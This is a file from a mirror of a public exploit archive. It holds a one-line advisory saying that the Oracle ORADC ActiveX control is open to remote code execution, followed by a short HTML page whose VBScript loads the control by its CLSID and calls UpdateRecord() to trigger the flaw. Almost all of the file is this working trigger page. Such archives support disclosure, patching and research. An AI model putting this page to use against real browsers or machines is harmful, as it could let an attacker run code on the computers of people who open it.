exploit-db-mirror/exploits/multiple/remote/29449.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

30 lines
No EOL
692 B
HTML

source: https://www.securityfocus.com/bid/22026/info
Oracle ORADC ActiveX control is prone to a remote code-execution vulnerability.
Exploiting this issue allows remote attackers to execute arbitrary machine code in the context of applications using the affected ActiveX control and possibly to compromise affected computers.
<!--
// CLSID: {EC4CF635-D196-11CE-9027-02608C4BF3B5}
// Info: ORADC Control
// ProgID: ORADC.ORADCCtrl.1
// InprocServer32: C:\\Oracle\\Ora81\\bin\\oradc.ocx
--!>
<html>
<body>
<OBJECT id="test" WIDTH=445 HEIGHT=40
classid="clsid:EC4CF635-D196-11CE-9027-02608C4BF3B5" >
</OBJECT>
<script language="vbscript">
test.UpdateRecord()
</script>
</body>
</html>